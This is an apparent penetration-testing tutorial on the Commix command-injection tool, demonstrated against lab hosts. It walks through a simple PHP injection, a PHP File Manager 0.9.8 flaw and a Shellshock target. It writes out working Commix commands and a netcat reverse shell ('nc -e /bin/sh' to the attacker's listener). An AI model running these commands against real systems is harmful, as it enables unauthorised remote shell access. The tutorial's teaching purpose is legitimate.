Commix, short for [comm]and [i]njection e[x]politer, is a tool for finding and exploiting command injection vulnerabilities in a given parameter. This article explains some of the major features of this tool by taking some vulnerable applications as targets. Usage of this tool is well documented for those with some basic knowledge of command injection exploitation.
Setting up Commix:
Download Commix by cloning the Git repository:
I have downloaded and installed it in Kali Linux, where we will run all our demos in this article.
I found the usage of this tool very simple. To get help we can type the following command.
python Commix.py –h
This section shows the usage and various options available with Commix. I wrote some scripts and took one target application from exploit-db.com for demonstrating different scenarios.
Example 1: Simple php command injection
Let’s start with a simple PHP command injection vulnerability to get started with the tool. The following is the script I have hosted in my target server.
This is accessible from the attacking machine using the following URL:
Let’s see Commix in action:
Run the following command to start with basic command injection.
python Commix.py –url=”http://10.1.1.8/cmdinj/vulnerable.php?cmd=INJECT_HERE”
Notice that I have replaced the value of the parameter “cmd” with “INJECT_HERE”. This is how Commix understands the target parameter to be tested. Now, Commix starts performing tests on this parameter and gives us an interactive shell as shown below.
The shell obtained in this example is not stable to execute some commands. You can observe the output of “id” command.
This is working fine when tried from a browser.
There are multiple ways in Commix to get around this. I just used Commix’s –os-cmd option to get an nc reverse shell from the target machine.
Listen for incoming connections on port 4444 as shown below.
Now, type in the following command with Commix.
python Commix.py –url=”http://10.1.1.8/cmdinj/vulnerable.php?cmd=INJECT_HERE” –os-cmd=”nc -e /bin/sh 10.1.1.9 4444″
Now, let’s look at the Netcat shell. We should be greeted with a new interactive shell where we can run the commands.
Note: If Netcat is not installed on the target machine, which is often the case; we can use other techniques such Python/Perl reverse shell.
Example 2: PHP File Manager 0.9.8 from www.exploit-db.com
The next example is to show another feature of Commix that can be leveraged to exploit command injection.
The vulnerable application can be downloaded from the link below.
Let us understand the application and find the command injection vulnerability manually.
Host the downloaded application in a server and run it from the browser.
Click “Enter” button and you should be landed in the following page.
The command injection vulnerability resides in “Execute Command” functionality of this page. When we click this button, it asks for a command to enter.
Enter an Operating System command as shown above and you should see the following link which is vulnerable to Command Injection.
Now, let’s see how we can use Commix tool to identify and exploit the above application.
Type in the following command.
python Commix.py –url=”http://10.1.1.8/phpfilemanager/index.php?action=6¤t_dir=/var/www/phpfilemanager/&cmd=INJECT_HERE”
The above step has failed for some reason. After exploring a while, I found that the target application is sending cookies to the server after clicking the button “Enter”.
Our injection attempt with Commix failed, as cookies were not provided. Commix has support for cookies as well. We can provide cookies using “—cookies” option. Let us intercept the request and provide cookies to Commix. This is shown below.
This time, our attempt was successful and we got a shell as shown below.
Example 3: Shellshock exploitation made easier
Personally, I liked the shellshock exploitation feature of Commix. If you are new to shellshock, please refer to the following articles written by me earlier.
These articles show the internals of shellshock, and how we can set up our own lab to practice shellshock exploitation. Commix tool makes it easier to exploit Shellshock vulnerability. I am using the same setup that I used in the above-mentioned articles to demonstrate Commix’s shellshock exploitation feature.
Below is the target URL.
Run the following command with “–shellshock” option to exploit the target.
python Commix.py –url=”http://10.1.1.8/cgi-bin/vulnerable.sh” –shellshock
As we can see in the above figure, we have a shell on the box.